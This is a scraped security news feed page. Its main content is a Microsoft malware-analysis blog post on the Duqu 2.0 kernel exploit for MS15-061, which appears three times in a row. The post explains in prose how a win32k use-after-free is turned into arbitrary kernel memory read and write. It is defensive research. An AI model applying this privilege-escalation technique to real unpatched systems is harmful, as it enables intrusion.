I'm also interested in see those devices/firewalls that respond with a SYN-ACK to any SYN. That's why, in the above picture, the "found" count is so high. I haven't actually found many real things, but it looks like it because these devices send SYN-ACKs without actually establishing TCP connections.

Anyway, send me a tweet @erratarob with information on how you perceive this incoming scan. Is your firewall and IDS handling it well? or do you have messed up configuration/policies where this causes more noise/concern than is warranted?

Feedly:SANS Internet Storm Center, InfoCON: green. ISC Stormcast For Monday, May 30th 2016 http://ift.tt/1PacCkL, (Mon, May 30th)



from SANS Internet Storm Center, InfoCON: green

...(more)...

Feedly:Microsoft Malware Protection Center. ​Duqu 2.0 kernel exploitation technique analysis (part 1 of 2)



from Microsoft Malware Protection Center

Out of the multiple components used in the sophisticated Duqu 2.0 cyberespionage attack, we had a chance to look into one of the kernel exploits used for its elevation-of-privilege attack.

Early this year, Kaspersky Lab discovered Duqu 2.0 and named it as such due to its close similarity to the original Duqu malware. Microsoft patched the vulnerability and published Security bulletin MS15-061 on June 9, 2015.

This blog takes a closer look at the exploitation technique used and not the vulnerability itself.

The road to corruption and control

The nature of the vulnerability itself is very straightforward. After the userland process registers its own ClientCopyImage callback, and when the callback is called from kernel, it destroys the Windows object. It also unregisters the associated class that triggered the callback, which leads to use-after-free condition. When the vulnerability is easy to understand, we found that the exploitation technique used was very complicated.

By indirectly allocating a structure just after the use-after-free condition, the attacker can control what happens next. The exploit calls the NtUserThunkedMenuItemInfo function. The call allocates various objects in place of the freed memory location.  The exploit then allocates objects to guarantee alignment precision such that the attacker-controlled address is used as a pointer to an object that is passed to HMUnlockObject, which is called by the kernel after the ClientCopyImage callback finishes.

The pointer falls just to the right location inside the tagCLS object to overwrite the cbclsExtra field when the instruction inside HMUnlockObject decreases the object reference counter. The tagCLS object address is calculated using the _MapDesktopObjectWin32k function.

How the use-after-free condition works

    Figure 1: How the use-after-free condition works

From the code below, rcx points inside of one of the tagCLS objects that the fake object points to. The instruction highlighted in yellow decreases the DWORD value of that memory location.

HMUnlockOBject to corrupt a memory location

    Figure 2: HMUnlockOBject to corrupt a memory location

The corruption target, rcx+8, points to cbclsExtra field of the tagCLS object. The tagCLS object is pre-allocated by calling a series of Windows APIs. The field indicates the size of extra class memory. Usually, APIs like GetClassLong and SetClassLong, are used to access extra class memory.

Original tagCLS object

    Figure 3: Original tagCLS object

The field is initialized to 0 in this case, which means there is no extra memory for this class. But with the HMUnlockObject instruction’s corruption of the memory, it becomes -1 or 0xffffffff in unsigned DWORD form.

Corrupt tagCLS object

    Figure 4: Corrupt tagCLS object

With the corrupt cbclsExtra field, the exploit can freely access extra memory address space using GetClassLong and SetClassLong API sets.

Because the code used ja instruction to check the maximum value for the APIs’ index parameter, there is an unsigned comparison between 0xffffffff and the index value. It then allows the exploit to access a wide range of kernel memory with read and write privilege.

Out of bounds index

    Figure 5: Out of bounds index

 

Opening up 64-bit memory address for read and write access

The tactic the attacker chose after the first corruption stage is also very interesting. It looks for a specific structure inside the tagWND class. The location of tagWND and its member object is calculated using the _MapDesktopObjectWin32k function.

By carefully calculating the tagWND objects’ location inside the kernel based on the object returned from the call, it locates the strName member variable inside the tagWND object by adding 0x0d8 value to the base of object.

Locating tagWND.strName

    Figure 6: Locating tagWND.strName

It is very interesting to know the reason why the exploit is using this field. Even when you have a wide range of read/write access to the system memory, you don’t cover the whole 64-bit memory space with GetClassLong and SetClassLong APIs. This is because they are bound by 32-bit index value even if the exploit runs on a 64-bit system. It is also not easy to know what address you are actually reading or writing. The exploit’s tactic is to corrupt the strName.Buffer member variable from tagWND and use it as leverage for further memory access. This time, it has full memory access with 64-bit memory range and with arbitrary length of data.

For example, from the following API log, NtUserSetClassLongPtr API was used to set the tagWND.strName.Buffer value to fffff6fb7dbedf90, which is arbitrary kernel memory location. If the InternalGetWindowText function is called, it retrieves bytes from the designated tagWND.strName.Buffer location.

Therefore, if you know the address of the memory location, you can read any data from the kernel.

Using InternalGetWindowText API to read from kernel memory

    Figure 7: Using InternalGetWindowText API to read from kernel memory

Another way is also possible, which is writing arbitrary memory location with any data. Use NtUserSetClassLongPtr API to set the tagWND.strName.Buffer value and call NtUserDefSetText function. It then writes any designated bytes to the target kernel memory location.

Using NtUserDefSetText API to write to kernel memory

    Figure 8: Using NtUserDefSetText API to write to kernel memory

In this way, malware perpetrators use the simple use-after-free vulnerability as a very powerful exploit that has full kernel memory access. Even when the exploit acquires full memory read and write privilege on the kernel, it is still tough to achieve code execution.

In the next blog, we will discuss the stage after this step, which is also quite interesting because it is about Windows kernel mitigations.

Acknowledgement: Thanks to Elia Florio for his advice on kernel land vulnerability analysis.

MMPC

Jeong Wook Oh

Feedly:Microsoft Malware Protection Center. ​Duqu 2.0 kernel exploitation technique analysis (part 1 of 2)



from Microsoft Malware Protection Center

Out of the multiple components used in the sophisticated Duqu 2.0 cyberespionage attack, we had a chance to look into one of the kernel exploits used for its elevation-of-privilege attack.

Early this year, Kaspersky Lab discovered Duqu 2.0 and named it as such due to its close similarity to the original Duqu malware. Microsoft patched the vulnerability and published Security bulletin MS15-061 on June 9, 2015.

This blog takes a closer look at the exploitation technique used and not the vulnerability itself.

The road to corruption and control

The nature of the vulnerability itself is very straightforward. After the userland process registers its own ClientCopyImage callback, and when the callback is called from kernel, it destroys the Windows object. It also unregisters the associated class that triggered the callback, which leads to use-after-free condition. When the vulnerability is easy to understand, we found that the exploitation technique used was very complicated.

By indirectly allocating a structure just after the use-after-free condition, the attacker can control what happens next. The exploit calls the NtUserThunkedMenuItemInfo function. The call allocates various objects in place of the freed memory location.  The exploit then allocates objects to guarantee alignment precision such that the attacker-controlled address is used as a pointer to an object that is passed to HMUnlockObject, which is called by the kernel after the ClientCopyImage callback finishes.

The pointer falls just to the right location inside the tagCLS object to overwrite the cbclsExtra field when the instruction inside HMUnlockObject decreases the object reference counter. The tagCLS object address is calculated using the _MapDesktopObjectWin32k function.

How the use-after-free condition works

    Figure 1: How the use-after-free condition works

From the code below, rcx points inside of one of the tagCLS objects that the fake object points to. The instruction highlighted in yellow decreases the DWORD value of that memory location.

HMUnlockOBject to corrupt a memory location

    Figure 2: HMUnlockOBject to corrupt a memory location

The corruption target, rcx+8, points to cbclsExtra field of the tagCLS object. The tagCLS object is pre-allocated by calling a series of Windows APIs. The field indicates the size of extra class memory. Usually, APIs like GetClassLong and SetClassLong, are used to access extra class memory.

Original tagCLS object

    Figure 3: Original tagCLS object

The field is initialized to 0 in this case, which means there is no extra memory for this class. But with the HMUnlockObject instruction’s corruption of the memory, it becomes -1 or 0xffffffff in unsigned DWORD form.

Corrupt tagCLS object

    Figure 4: Corrupt tagCLS object

With the corrupt cbclsExtra field, the exploit can freely access extra memory address space using GetClassLong and SetClassLong API sets.

Because the code used ja instruction to check the maximum value for the APIs’ index parameter, there is an unsigned comparison between 0xffffffff and the index value. It then allows the exploit to access a wide range of kernel memory with read and write privilege.

Out of bounds index

    Figure 5: Out of bounds index

 

Opening up 64-bit memory address for read and write access

The tactic the attacker chose after the first corruption stage is also very interesting. It looks for a specific structure inside the tagWND class. The location of tagWND and its member object is calculated using the _MapDesktopObjectWin32k function.

By carefully calculating the tagWND objects’ location inside the kernel based on the object returned from the call, it locates the strName member variable inside the tagWND object by adding 0x0d8 value to the base of object.

Locating tagWND.strName

    Figure 6: Locating tagWND.strName

It is very interesting to know the reason why the exploit is using this field. Even when you have a wide range of read/write access to the system memory, you don’t cover the whole 64-bit memory space with GetClassLong and SetClassLong APIs. This is because they are bound by 32-bit index value even if the exploit runs on a 64-bit system. It is also not easy to know what address you are actually reading or writing. The exploit’s tactic is to corrupt the strName.Buffer member variable from tagWND and use it as leverage for further memory access. This time, it has full memory access with 64-bit memory range and with arbitrary length of data.

For example, from the following API log, NtUserSetClassLongPtr API was used to set the tagWND.strName.Buffer value to fffff6fb7dbedf90, which is arbitrary kernel memory location. If the InternalGetWindowText function is called, it retrieves bytes from the designated tagWND.strName.Buffer location.

Therefore, if you know the address of the memory location, you can read any data from the kernel.

Using InternalGetWindowText API to read from kernel memory

    Figure 7: Using InternalGetWindowText API to read from kernel memory

Another way is also possible, which is writing arbitrary memory location with any data. Use NtUserSetClassLongPtr API to set the tagWND.strName.Buffer value and call NtUserDefSetText function. It then writes any designated bytes to the target kernel memory location.

Using NtUserDefSetText API to write to kernel memory

    Figure 8: Using NtUserDefSetText API to write to kernel memory

In this way, malware perpetrators use the simple use-after-free vulnerability as a very powerful exploit that has full kernel memory access. Even when the exploit acquires full memory read and write privilege on the kernel, it is still tough to achieve code execution.

In the next blog, we will discuss the stage after this step, which is also quite interesting because it is about Windows kernel mitigations.

Acknowledgement: Thanks to Elia Florio for his advice on kernel land vulnerability analysis.

MMPC

Jeong Wook Oh

Feedly:Microsoft Malware Protection Center. ​Duqu 2.0 kernel exploitation technique analysis (part 1 of 2)



from Microsoft Malware Protection Center

Out of the multiple components used in the sophisticated Duqu 2.0 cyberespionage attack, we had a chance to look into one of the kernel exploits used for its elevation-of-privilege attack.

Early this year, Kaspersky Lab discovered Duqu 2.0 and named it as such due to its close similarity to the original Duqu malware. Microsoft patched the vulnerability and published Security bulletin MS15-061 on June 9, 2015.

This blog takes a closer look at the exploitation technique used and not the vulnerability itself.

The road to corruption and control

The nature of the vulnerability itself is very straightforward. After the userland process registers its own ClientCopyImage callback, and when the callback is called from kernel, it destroys the Windows object. It also unregisters the associated class that triggered the callback, which leads to use-after-free condition. When the vulnerability is easy to understand, we found that the exploitation technique used was very complicated.

By indirectly allocating a structure just after the use-after-free condition, the attacker can control what happens next. The exploit calls the NtUserThunkedMenuItemInfo function. The call allocates various objects in place of the freed memory location.  The exploit then allocates objects to guarantee alignment precision such that the attacker-controlled address is used as a pointer to an object that is passed to HMUnlockObject, which is called by the kernel after the ClientCopyImage callback finishes.

The pointer falls just to the right location inside the tagCLS object to overwrite the cbclsExtra field when the instruction inside HMUnlockObject decreases the object reference counter. The tagCLS object address is calculated using the _MapDesktopObjectWin32k function.

How the use-after-free condition works

    Figure 1: How the use-after-free condition works

From the code below, rcx points inside of one of the tagCLS objects that the fake object points to. The instruction highlighted in yellow decreases the DWORD value of that memory location.

HMUnlockOBject to corrupt a memory location

    Figure 2: HMUnlockOBject to corrupt a memory location

The corruption target, rcx+8, points to cbclsExtra field of the tagCLS object. The tagCLS object is pre-allocated by calling a series of Windows APIs. The field indicates the size of extra class memory. Usually, APIs like GetClassLong and SetClassLong, are used to access extra class memory.

Original tagCLS object

    Figure 3: Original tagCLS object

The field is initialized to 0 in this case, which means there is no extra memory for this class. But with the HMUnlockObject instruction’s corruption of the memory, it becomes -1 or 0xffffffff in unsigned DWORD form.

Corrupt tagCLS object

    Figure 4: Corrupt tagCLS object

With the corrupt cbclsExtra field, the exploit can freely access extra memory address space using GetClassLong and SetClassLong API sets.

Because the code used ja instruction to check the maximum value for the APIs’ index parameter, there is an unsigned comparison between 0xffffffff and the index value. It then allows the exploit to access a wide range of kernel memory with read and write privilege.

Out of bounds index

    Figure 5: Out of bounds index

 

Opening up 64-bit memory address for read and write access

The tactic the attacker chose after the first corruption stage is also very interesting. It looks for a specific structure inside the tagWND class. The location of tagWND and its member object is calculated using the _MapDesktopObjectWin32k function.

By carefully calculating the tagWND objects’ location inside the kernel based on the object returned from the call, it locates the strName member variable inside the tagWND object by adding 0x0d8 value to the base of object.

Locating tagWND.strName

    Figure 6: Locating tagWND.strName

It is very interesting to know the reason why the exploit is using this field. Even when you have a wide range of read/write access to the system memory, you don’t cover the whole 64-bit memory space with GetClassLong and SetClassLong APIs. This is because they are bound by 32-bit index value even if the exploit runs on a 64-bit system. It is also not easy to know what address you are actually reading or writing. The exploit’s tactic is to corrupt the strName.Buffer member variable from tagWND and use it as leverage for further memory access. This time, it has full memory access with 64-bit memory range and with arbitrary length of data.

For example, from the following API log, NtUserSetClassLongPtr API was used to set the tagWND.strName.Buffer value to fffff6fb7dbedf90, which is arbitrary kernel memory location. If the InternalGetWindowText function is called, it retrieves bytes from the designated tagWND.strName.Buffer location.

Therefore, if you know the address of the memory location, you can read any data from the kernel.

Using InternalGetWindowText API to read from kernel memory

    Figure 7: Using InternalGetWindowText API to read from kernel memory

Another way is also possible, which is writing arbitrary memory location with any data. Use NtUserSetClassLongPtr API to set the tagWND.strName.Buffer value and call NtUserDefSetText function. It then writes any designated bytes to the target kernel memory location.

Using NtUserDefSetText API to write to kernel memory

    Figure 8: Using NtUserDefSetText API to write to kernel memory

In this way, malware perpetrators use the simple use-after-free vulnerability as a very powerful exploit that has full kernel memory access. Even when the exploit acquires full memory read and write privilege on the kernel, it is still tough to achieve code execution.

In the next blog, we will discuss the stage after this step, which is also quite interesting because it is about Windows kernel mitigations.

Acknowledgement: Thanks to Elia Florio for his advice on kernel land vulnerability analysis.

MMPC

Jeong Wook Oh

Web Analytics